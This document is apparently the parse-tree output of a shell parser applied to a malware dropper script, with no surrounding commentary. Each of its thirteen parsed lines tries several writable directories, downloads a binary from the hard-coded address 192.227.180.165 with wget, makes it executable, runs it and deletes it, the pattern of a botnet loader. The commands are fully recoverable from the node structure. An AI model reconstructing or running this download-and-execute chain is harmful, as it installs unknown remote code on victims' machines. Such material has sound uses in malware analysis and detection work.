ListNode(lineno=2, pos=(12, 147), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 102), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 102), word='http://192.227.180.165/vgsfdag'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(102, 103)),
  CommandNode(lineno=2, pos=(104, 120), parts=[
    WordNode(lineno=2, pos=(104, 109), word='chmod'),
    WordNode(lineno=2, pos=(110, 112), word='+x'),
    WordNode(lineno=2, pos=(113, 120), word='vgsfdag'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(120, 121)),
  CommandNode(lineno=2, pos=(122, 131), parts=[
    WordNode(lineno=2, pos=(122, 131), word='./vgsfdag'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(131, 132)),
  CommandNode(lineno=2, pos=(133, 147), parts=[
    WordNode(lineno=2, pos=(133, 135), word='rm'),
    WordNode(lineno=2, pos=(136, 139), word='-rf'),
    WordNode(lineno=2, pos=(140, 147), word='vgsfdag'),
  ]),
])
ListNode(lineno=3, pos=(148, 271), parts=[
  CommandNode(lineno=3, pos=(148, 155), parts=[
    WordNode(lineno=3, pos=(148, 150), word='cd'),
    WordNode(lineno=3, pos=(151, 155), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(156, 158)),
  CommandNode(lineno=3, pos=(159, 170), parts=[
    WordNode(lineno=3, pos=(159, 161), word='cd'),
    WordNode(lineno=3, pos=(162, 170), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(171, 173)),
  CommandNode(lineno=3, pos=(174, 181), parts=[
    WordNode(lineno=3, pos=(174, 176), word='cd'),
    WordNode(lineno=3, pos=(177, 181), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(182, 184)),
  CommandNode(lineno=3, pos=(185, 193), parts=[
    WordNode(lineno=3, pos=(185, 187), word='cd'),
    WordNode(lineno=3, pos=(188, 193), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(194, 196)),
  CommandNode(lineno=3, pos=(197, 201), parts=[
    WordNode(lineno=3, pos=(197, 199), word='cd'),
    WordNode(lineno=3, pos=(200, 201), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(201, 202)),
  CommandNode(lineno=3, pos=(203, 235), parts=[
    WordNode(lineno=3, pos=(203, 207), word='wget'),
    WordNode(lineno=3, pos=(208, 235), word='http://192.227.180.165/fdsg'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(235, 236)),
  CommandNode(lineno=3, pos=(237, 250), parts=[
    WordNode(lineno=3, pos=(237, 242), word='chmod'),
    WordNode(lineno=3, pos=(243, 245), word='+x'),
    WordNode(lineno=3, pos=(246, 250), word='fdsg'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(250, 251)),
  CommandNode(lineno=3, pos=(252, 258), parts=[
    WordNode(lineno=3, pos=(252, 258), word='./fdsg'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(258, 259)),
  CommandNode(lineno=3, pos=(260, 271), parts=[
    WordNode(lineno=3, pos=(260, 262), word='rm'),
    WordNode(lineno=3, pos=(263, 266), word='-rf'),
    WordNode(lineno=3, pos=(267, 271), word='fdsg'),
  ]),
])
ListNode(lineno=4, pos=(272, 391), parts=[
  CommandNode(lineno=4, pos=(272, 279), parts=[
    WordNode(lineno=4, pos=(272, 274), word='cd'),
    WordNode(lineno=4, pos=(275, 279), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(280, 282)),
  CommandNode(lineno=4, pos=(283, 294), parts=[
    WordNode(lineno=4, pos=(283, 285), word='cd'),
    WordNode(lineno=4, pos=(286, 294), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(295, 297)),
  CommandNode(lineno=4, pos=(298, 305), parts=[
    WordNode(lineno=4, pos=(298, 300), word='cd'),
    WordNode(lineno=4, pos=(301, 305), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(306, 308)),
  CommandNode(lineno=4, pos=(309, 317), parts=[
    WordNode(lineno=4, pos=(309, 311), word='cd'),
    WordNode(lineno=4, pos=(312, 317), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(318, 320)),
  CommandNode(lineno=4, pos=(321, 325), parts=[
    WordNode(lineno=4, pos=(321, 323), word='cd'),
    WordNode(lineno=4, pos=(324, 325), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(325, 326)),
  CommandNode(lineno=4, pos=(327, 358), parts=[
    WordNode(lineno=4, pos=(327, 331), word='wget'),
    WordNode(lineno=4, pos=(332, 358), word='http://192.227.180.165/sgf'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(358, 359)),
  CommandNode(lineno=4, pos=(360, 372), parts=[
    WordNode(lineno=4, pos=(360, 365), word='chmod'),
    WordNode(lineno=4, pos=(366, 368), word='+x'),
    WordNode(lineno=4, pos=(369, 372), word='sgf'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(372, 373)),
  CommandNode(lineno=4, pos=(374, 379), parts=[
    WordNode(lineno=4, pos=(374, 379), word='./sgf'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(379, 380)),
  CommandNode(lineno=4, pos=(381, 391), parts=[
    WordNode(lineno=4, pos=(381, 383), word='rm'),
    WordNode(lineno=4, pos=(384, 387), word='-rf'),
    WordNode(lineno=4, pos=(388, 391), word='sgf'),
  ]),
])
ListNode(lineno=5, pos=(392, 511), parts=[
  CommandNode(lineno=5, pos=(392, 399), parts=[
    WordNode(lineno=5, pos=(392, 394), word='cd'),
    WordNode(lineno=5, pos=(395, 399), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(400, 402)),
  CommandNode(lineno=5, pos=(403, 414), parts=[
    WordNode(lineno=5, pos=(403, 405), word='cd'),
    WordNode(lineno=5, pos=(406, 414), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(415, 417)),
  CommandNode(lineno=5, pos=(418, 425), parts=[
    WordNode(lineno=5, pos=(418, 420), word='cd'),
    WordNode(lineno=5, pos=(421, 425), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(426, 428)),
  CommandNode(lineno=5, pos=(429, 437), parts=[
    WordNode(lineno=5, pos=(429, 431), word='cd'),
    WordNode(lineno=5, pos=(432, 437), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(438, 440)),
  CommandNode(lineno=5, pos=(441, 445), parts=[
    WordNode(lineno=5, pos=(441, 443), word='cd'),
    WordNode(lineno=5, pos=(444, 445), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(445, 446)),
  CommandNode(lineno=5, pos=(447, 478), parts=[
    WordNode(lineno=5, pos=(447, 451), word='wget'),
    WordNode(lineno=5, pos=(452, 478), word='http://192.227.180.165/sfg'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(478, 479)),
  CommandNode(lineno=5, pos=(480, 492), parts=[
    WordNode(lineno=5, pos=(480, 485), word='chmod'),
    WordNode(lineno=5, pos=(486, 488), word='+x'),
    WordNode(lineno=5, pos=(489, 492), word='sfg'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(492, 493)),
  CommandNode(lineno=5, pos=(494, 499), parts=[
    WordNode(lineno=5, pos=(494, 499), word='./sfg'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(499, 500)),
  CommandNode(lineno=5, pos=(501, 511), parts=[
    WordNode(lineno=5, pos=(501, 503), word='rm'),
    WordNode(lineno=5, pos=(504, 507), word='-rf'),
    WordNode(lineno=5, pos=(508, 511), word='sfg'),
  ]),
])
ListNode(lineno=6, pos=(512, 631), parts=[
  CommandNode(lineno=6, pos=(512, 519), parts=[
    WordNode(lineno=6, pos=(512, 514), word='cd'),
    WordNode(lineno=6, pos=(515, 519), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(520, 522)),
  CommandNode(lineno=6, pos=(523, 534), parts=[
    WordNode(lineno=6, pos=(523, 525), word='cd'),
    WordNode(lineno=6, pos=(526, 534), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(535, 537)),
  CommandNode(lineno=6, pos=(538, 545), parts=[
    WordNode(lineno=6, pos=(538, 540), word='cd'),
    WordNode(lineno=6, pos=(541, 545), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(546, 548)),
  CommandNode(lineno=6, pos=(549, 557), parts=[
    WordNode(lineno=6, pos=(549, 551), word='cd'),
    WordNode(lineno=6, pos=(552, 557), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(558, 560)),
  CommandNode(lineno=6, pos=(561, 565), parts=[
    WordNode(lineno=6, pos=(561, 563), word='cd'),
    WordNode(lineno=6, pos=(564, 565), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(565, 566)),
  CommandNode(lineno=6, pos=(567, 598), parts=[
    WordNode(lineno=6, pos=(567, 571), word='wget'),
    WordNode(lineno=6, pos=(572, 598), word='http://192.227.180.165/sgf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(598, 599)),
  CommandNode(lineno=6, pos=(600, 612), parts=[
    WordNode(lineno=6, pos=(600, 605), word='chmod'),
    WordNode(lineno=6, pos=(606, 608), word='+x'),
    WordNode(lineno=6, pos=(609, 612), word='sgf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(612, 613)),
  CommandNode(lineno=6, pos=(614, 619), parts=[
    WordNode(lineno=6, pos=(614, 619), word='./sgf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(619, 620)),
  CommandNode(lineno=6, pos=(621, 631), parts=[
    WordNode(lineno=6, pos=(621, 623), word='rm'),
    WordNode(lineno=6, pos=(624, 627), word='-rf'),
    WordNode(lineno=6, pos=(628, 631), word='sgf'),
  ]),
])
ListNode(lineno=7, pos=(632, 755), parts=[
  CommandNode(lineno=7, pos=(632, 639), parts=[
    WordNode(lineno=7, pos=(632, 634), word='cd'),
    WordNode(lineno=7, pos=(635, 639), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(640, 642)),
  CommandNode(lineno=7, pos=(643, 654), parts=[
    WordNode(lineno=7, pos=(643, 645), word='cd'),
    WordNode(lineno=7, pos=(646, 654), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(655, 657)),
  CommandNode(lineno=7, pos=(658, 665), parts=[
    WordNode(lineno=7, pos=(658, 660), word='cd'),
    WordNode(lineno=7, pos=(661, 665), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(666, 668)),
  CommandNode(lineno=7, pos=(669, 677), parts=[
    WordNode(lineno=7, pos=(669, 671), word='cd'),
    WordNode(lineno=7, pos=(672, 677), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(678, 680)),
  CommandNode(lineno=7, pos=(681, 685), parts=[
    WordNode(lineno=7, pos=(681, 683), word='cd'),
    WordNode(lineno=7, pos=(684, 685), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(685, 686)),
  CommandNode(lineno=7, pos=(687, 719), parts=[
    WordNode(lineno=7, pos=(687, 691), word='wget'),
    WordNode(lineno=7, pos=(692, 719), word='http://192.227.180.165/sdfg'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(719, 720)),
  CommandNode(lineno=7, pos=(721, 734), parts=[
    WordNode(lineno=7, pos=(721, 726), word='chmod'),
    WordNode(lineno=7, pos=(727, 729), word='+x'),
    WordNode(lineno=7, pos=(730, 734), word='sdfg'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(734, 735)),
  CommandNode(lineno=7, pos=(736, 742), parts=[
    WordNode(lineno=7, pos=(736, 742), word='./sdfg'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(742, 743)),
  CommandNode(lineno=7, pos=(744, 755), parts=[
    WordNode(lineno=7, pos=(744, 746), word='rm'),
    WordNode(lineno=7, pos=(747, 750), word='-rf'),
    WordNode(lineno=7, pos=(751, 755), word='sdfg'),
  ]),
])
ListNode(lineno=8, pos=(756, 875), parts=[
  CommandNode(lineno=8, pos=(756, 763), parts=[
    WordNode(lineno=8, pos=(756, 758), word='cd'),
    WordNode(lineno=8, pos=(759, 763), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(764, 766)),
  CommandNode(lineno=8, pos=(767, 778), parts=[
    WordNode(lineno=8, pos=(767, 769), word='cd'),
    WordNode(lineno=8, pos=(770, 778), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(779, 781)),
  CommandNode(lineno=8, pos=(782, 789), parts=[
    WordNode(lineno=8, pos=(782, 784), word='cd'),
    WordNode(lineno=8, pos=(785, 789), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(790, 792)),
  CommandNode(lineno=8, pos=(793, 801), parts=[
    WordNode(lineno=8, pos=(793, 795), word='cd'),
    WordNode(lineno=8, pos=(796, 801), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(802, 804)),
  CommandNode(lineno=8, pos=(805, 809), parts=[
    WordNode(lineno=8, pos=(805, 807), word='cd'),
    WordNode(lineno=8, pos=(808, 809), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(809, 810)),
  CommandNode(lineno=8, pos=(811, 842), parts=[
    WordNode(lineno=8, pos=(811, 815), word='wget'),
    WordNode(lineno=8, pos=(816, 842), word='http://192.227.180.165/sdf'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(842, 843)),
  CommandNode(lineno=8, pos=(844, 856), parts=[
    WordNode(lineno=8, pos=(844, 849), word='chmod'),
    WordNode(lineno=8, pos=(850, 852), word='+x'),
    WordNode(lineno=8, pos=(853, 856), word='sdf'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(856, 857)),
  CommandNode(lineno=8, pos=(858, 863), parts=[
    WordNode(lineno=8, pos=(858, 863), word='./sdf'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(863, 864)),
  CommandNode(lineno=8, pos=(865, 875), parts=[
    WordNode(lineno=8, pos=(865, 867), word='rm'),
    WordNode(lineno=8, pos=(868, 871), word='-rf'),
    WordNode(lineno=8, pos=(872, 875), word='sdf'),
  ]),
])
ListNode(lineno=9, pos=(876, 999), parts=[
  CommandNode(lineno=9, pos=(876, 883), parts=[
    WordNode(lineno=9, pos=(876, 878), word='cd'),
    WordNode(lineno=9, pos=(879, 883), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(884, 886)),
  CommandNode(lineno=9, pos=(887, 898), parts=[
    WordNode(lineno=9, pos=(887, 889), word='cd'),
    WordNode(lineno=9, pos=(890, 898), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(899, 901)),
  CommandNode(lineno=9, pos=(902, 909), parts=[
    WordNode(lineno=9, pos=(902, 904), word='cd'),
    WordNode(lineno=9, pos=(905, 909), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(910, 912)),
  CommandNode(lineno=9, pos=(913, 921), parts=[
    WordNode(lineno=9, pos=(913, 915), word='cd'),
    WordNode(lineno=9, pos=(916, 921), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(922, 924)),
  CommandNode(lineno=9, pos=(925, 929), parts=[
    WordNode(lineno=9, pos=(925, 927), word='cd'),
    WordNode(lineno=9, pos=(928, 929), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(929, 930)),
  CommandNode(lineno=9, pos=(931, 963), parts=[
    WordNode(lineno=9, pos=(931, 935), word='wget'),
    WordNode(lineno=9, pos=(936, 963), word='http://192.227.180.165/sgfd'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(963, 964)),
  CommandNode(lineno=9, pos=(965, 978), parts=[
    WordNode(lineno=9, pos=(965, 970), word='chmod'),
    WordNode(lineno=9, pos=(971, 973), word='+x'),
    WordNode(lineno=9, pos=(974, 978), word='sgfd'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(978, 979)),
  CommandNode(lineno=9, pos=(980, 986), parts=[
    WordNode(lineno=9, pos=(980, 986), word='./sgfd'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(986, 987)),
  CommandNode(lineno=9, pos=(988, 999), parts=[
    WordNode(lineno=9, pos=(988, 990), word='rm'),
    WordNode(lineno=9, pos=(991, 994), word='-rf'),
    WordNode(lineno=9, pos=(995, 999), word='sgfd'),
  ]),
])
ListNode(lineno=10, pos=(1000, 1127), parts=[
  CommandNode(lineno=10, pos=(1000, 1007), parts=[
    WordNode(lineno=10, pos=(1000, 1002), word='cd'),
    WordNode(lineno=10, pos=(1003, 1007), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1008, 1010)),
  CommandNode(lineno=10, pos=(1011, 1022), parts=[
    WordNode(lineno=10, pos=(1011, 1013), word='cd'),
    WordNode(lineno=10, pos=(1014, 1022), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1023, 1025)),
  CommandNode(lineno=10, pos=(1026, 1033), parts=[
    WordNode(lineno=10, pos=(1026, 1028), word='cd'),
    WordNode(lineno=10, pos=(1029, 1033), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1034, 1036)),
  CommandNode(lineno=10, pos=(1037, 1045), parts=[
    WordNode(lineno=10, pos=(1037, 1039), word='cd'),
    WordNode(lineno=10, pos=(1040, 1045), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1046, 1048)),
  CommandNode(lineno=10, pos=(1049, 1053), parts=[
    WordNode(lineno=10, pos=(1049, 1051), word='cd'),
    WordNode(lineno=10, pos=(1052, 1053), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1053, 1054)),
  CommandNode(lineno=10, pos=(1055, 1088), parts=[
    WordNode(lineno=10, pos=(1055, 1059), word='wget'),
    WordNode(lineno=10, pos=(1060, 1088), word='http://192.227.180.165/fghjd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1088, 1089)),
  CommandNode(lineno=10, pos=(1090, 1104), parts=[
    WordNode(lineno=10, pos=(1090, 1095), word='chmod'),
    WordNode(lineno=10, pos=(1096, 1098), word='+x'),
    WordNode(lineno=10, pos=(1099, 1104), word='fghjd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1104, 1105)),
  CommandNode(lineno=10, pos=(1106, 1113), parts=[
    WordNode(lineno=10, pos=(1106, 1113), word='./fghjd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1113, 1114)),
  CommandNode(lineno=10, pos=(1115, 1127), parts=[
    WordNode(lineno=10, pos=(1115, 1117), word='rm'),
    WordNode(lineno=10, pos=(1118, 1121), word='-rf'),
    WordNode(lineno=10, pos=(1122, 1127), word='fghjd'),
  ]),
])
ListNode(lineno=11, pos=(1128, 1275), parts=[
  CommandNode(lineno=11, pos=(1128, 1135), parts=[
    WordNode(lineno=11, pos=(1128, 1130), word='cd'),
    WordNode(lineno=11, pos=(1131, 1135), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1136, 1138)),
  CommandNode(lineno=11, pos=(1139, 1150), parts=[
    WordNode(lineno=11, pos=(1139, 1141), word='cd'),
    WordNode(lineno=11, pos=(1142, 1150), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1151, 1153)),
  CommandNode(lineno=11, pos=(1154, 1161), parts=[
    WordNode(lineno=11, pos=(1154, 1156), word='cd'),
    WordNode(lineno=11, pos=(1157, 1161), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1162, 1164)),
  CommandNode(lineno=11, pos=(1165, 1173), parts=[
    WordNode(lineno=11, pos=(1165, 1167), word='cd'),
    WordNode(lineno=11, pos=(1168, 1173), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1174, 1176)),
  CommandNode(lineno=11, pos=(1177, 1181), parts=[
    WordNode(lineno=11, pos=(1177, 1179), word='cd'),
    WordNode(lineno=11, pos=(1180, 1181), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1181, 1182)),
  CommandNode(lineno=11, pos=(1183, 1221), parts=[
    WordNode(lineno=11, pos=(1183, 1187), word='wget'),
    WordNode(lineno=11, pos=(1188, 1221), word='http://192.227.180.165/gfjfdjdjfd'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1221, 1222)),
  CommandNode(lineno=11, pos=(1223, 1242), parts=[
    WordNode(lineno=11, pos=(1223, 1228), word='chmod'),
    WordNode(lineno=11, pos=(1229, 1231), word='+x'),
    WordNode(lineno=11, pos=(1232, 1242), word='gfjfdjdjfd'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1242, 1243)),
  CommandNode(lineno=11, pos=(1244, 1256), parts=[
    WordNode(lineno=11, pos=(1244, 1256), word='./gfjfdjdjfd'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1256, 1257)),
  CommandNode(lineno=11, pos=(1258, 1275), parts=[
    WordNode(lineno=11, pos=(1258, 1260), word='rm'),
    WordNode(lineno=11, pos=(1261, 1264), word='-rf'),
    WordNode(lineno=11, pos=(1265, 1275), word='gfjfdjdjfd'),
  ]),
])
ListNode(lineno=12, pos=(1276, 1435), parts=[
  CommandNode(lineno=12, pos=(1276, 1283), parts=[
    WordNode(lineno=12, pos=(1276, 1278), word='cd'),
    WordNode(lineno=12, pos=(1279, 1283), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1284, 1286)),
  CommandNode(lineno=12, pos=(1287, 1298), parts=[
    WordNode(lineno=12, pos=(1287, 1289), word='cd'),
    WordNode(lineno=12, pos=(1290, 1298), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1299, 1301)),
  CommandNode(lineno=12, pos=(1302, 1309), parts=[
    WordNode(lineno=12, pos=(1302, 1304), word='cd'),
    WordNode(lineno=12, pos=(1305, 1309), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1310, 1312)),
  CommandNode(lineno=12, pos=(1313, 1321), parts=[
    WordNode(lineno=12, pos=(1313, 1315), word='cd'),
    WordNode(lineno=12, pos=(1316, 1321), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1322, 1324)),
  CommandNode(lineno=12, pos=(1325, 1329), parts=[
    WordNode(lineno=12, pos=(1325, 1327), word='cd'),
    WordNode(lineno=12, pos=(1328, 1329), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1329, 1330)),
  CommandNode(lineno=12, pos=(1331, 1372), parts=[
    WordNode(lineno=12, pos=(1331, 1335), word='wget'),
    WordNode(lineno=12, pos=(1336, 1372), word='http://192.227.180.165/[dfjdfjgfdjf]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1372, 1373)),
  CommandNode(lineno=12, pos=(1374, 1396), parts=[
    WordNode(lineno=12, pos=(1374, 1379), word='chmod'),
    WordNode(lineno=12, pos=(1380, 1382), word='+x'),
    WordNode(lineno=12, pos=(1383, 1396), word='[dfjdfjgfdjf]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1396, 1397)),
  CommandNode(lineno=12, pos=(1398, 1413), parts=[
    WordNode(lineno=12, pos=(1398, 1413), word='./[dfjdfjgfdjf]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1413, 1414)),
  CommandNode(lineno=12, pos=(1415, 1435), parts=[
    WordNode(lineno=12, pos=(1415, 1417), word='rm'),
    WordNode(lineno=12, pos=(1418, 1421), word='-rf'),
    WordNode(lineno=12, pos=(1422, 1435), word='[dfjdfjgfdjf]'),
  ]),
])
ListNode(lineno=13, pos=(1436, 1575), parts=[
  CommandNode(lineno=13, pos=(1436, 1443), parts=[
    WordNode(lineno=13, pos=(1436, 1438), word='cd'),
    WordNode(lineno=13, pos=(1439, 1443), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1444, 1446)),
  CommandNode(lineno=13, pos=(1447, 1458), parts=[
    WordNode(lineno=13, pos=(1447, 1449), word='cd'),
    WordNode(lineno=13, pos=(1450, 1458), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1459, 1461)),
  CommandNode(lineno=13, pos=(1462, 1469), parts=[
    WordNode(lineno=13, pos=(1462, 1464), word='cd'),
    WordNode(lineno=13, pos=(1465, 1469), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1470, 1472)),
  CommandNode(lineno=13, pos=(1473, 1481), parts=[
    WordNode(lineno=13, pos=(1473, 1475), word='cd'),
    WordNode(lineno=13, pos=(1476, 1481), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1482, 1484)),
  CommandNode(lineno=13, pos=(1485, 1489), parts=[
    WordNode(lineno=13, pos=(1485, 1487), word='cd'),
    WordNode(lineno=13, pos=(1488, 1489), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1489, 1490)),
  CommandNode(lineno=13, pos=(1491, 1527), parts=[
    WordNode(lineno=13, pos=(1491, 1495), word='wget'),
    WordNode(lineno=13, pos=(1496, 1527), word='http://192.227.180.165/fjdfdfdj'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1527, 1528)),
  CommandNode(lineno=13, pos=(1529, 1546), parts=[
    WordNode(lineno=13, pos=(1529, 1534), word='chmod'),
    WordNode(lineno=13, pos=(1535, 1537), word='+x'),
    WordNode(lineno=13, pos=(1538, 1546), word='fjdfdfdj'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1546, 1547)),
  CommandNode(lineno=13, pos=(1548, 1558), parts=[
    WordNode(lineno=13, pos=(1548, 1558), word='./fjdfdfdj'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1558, 1559)),
  CommandNode(lineno=13, pos=(1560, 1575), parts=[
    WordNode(lineno=13, pos=(1560, 1562), word='rm'),
    WordNode(lineno=13, pos=(1563, 1566), word='-rf'),
    WordNode(lineno=13, pos=(1567, 1575), word='fjdfdfdj'),
  ]),
])
ListNode(lineno=14, pos=(1576, 1735), parts=[
  CommandNode(lineno=14, pos=(1576, 1583), parts=[
    WordNode(lineno=14, pos=(1576, 1578), word='cd'),
    WordNode(lineno=14, pos=(1579, 1583), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1584, 1586)),
  CommandNode(lineno=14, pos=(1587, 1598), parts=[
    WordNode(lineno=14, pos=(1587, 1589), word='cd'),
    WordNode(lineno=14, pos=(1590, 1598), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1599, 1601)),
  CommandNode(lineno=14, pos=(1602, 1609), parts=[
    WordNode(lineno=14, pos=(1602, 1604), word='cd'),
    WordNode(lineno=14, pos=(1605, 1609), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1610, 1612)),
  CommandNode(lineno=14, pos=(1613, 1621), parts=[
    WordNode(lineno=14, pos=(1613, 1615), word='cd'),
    WordNode(lineno=14, pos=(1616, 1621), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1622, 1624)),
  CommandNode(lineno=14, pos=(1625, 1629), parts=[
    WordNode(lineno=14, pos=(1625, 1627), word='cd'),
    WordNode(lineno=14, pos=(1628, 1629), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1629, 1630)),
  CommandNode(lineno=14, pos=(1631, 1672), parts=[
    WordNode(lineno=14, pos=(1631, 1635), word='wget'),
    WordNode(lineno=14, pos=(1636, 1672), word='http://192.227.180.165/dfjdjgfjdfjfd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1672, 1673)),
  CommandNode(lineno=14, pos=(1674, 1696), parts=[
    WordNode(lineno=14, pos=(1674, 1679), word='chmod'),
    WordNode(lineno=14, pos=(1680, 1682), word='+x'),
    WordNode(lineno=14, pos=(1683, 1696), word='dfjdjgfjdfjfd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1696, 1697)),
  CommandNode(lineno=14, pos=(1698, 1713), parts=[
    WordNode(lineno=14, pos=(1698, 1713), word='./dfjdjgfjdfjfd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1713, 1714)),
  CommandNode(lineno=14, pos=(1715, 1735), parts=[
    WordNode(lineno=14, pos=(1715, 1717), word='rm'),
    WordNode(lineno=14, pos=(1718, 1721), word='-rf'),
    WordNode(lineno=14, pos=(1722, 1735), word='dfjdjgfjdfjfd'),
  ]),
])
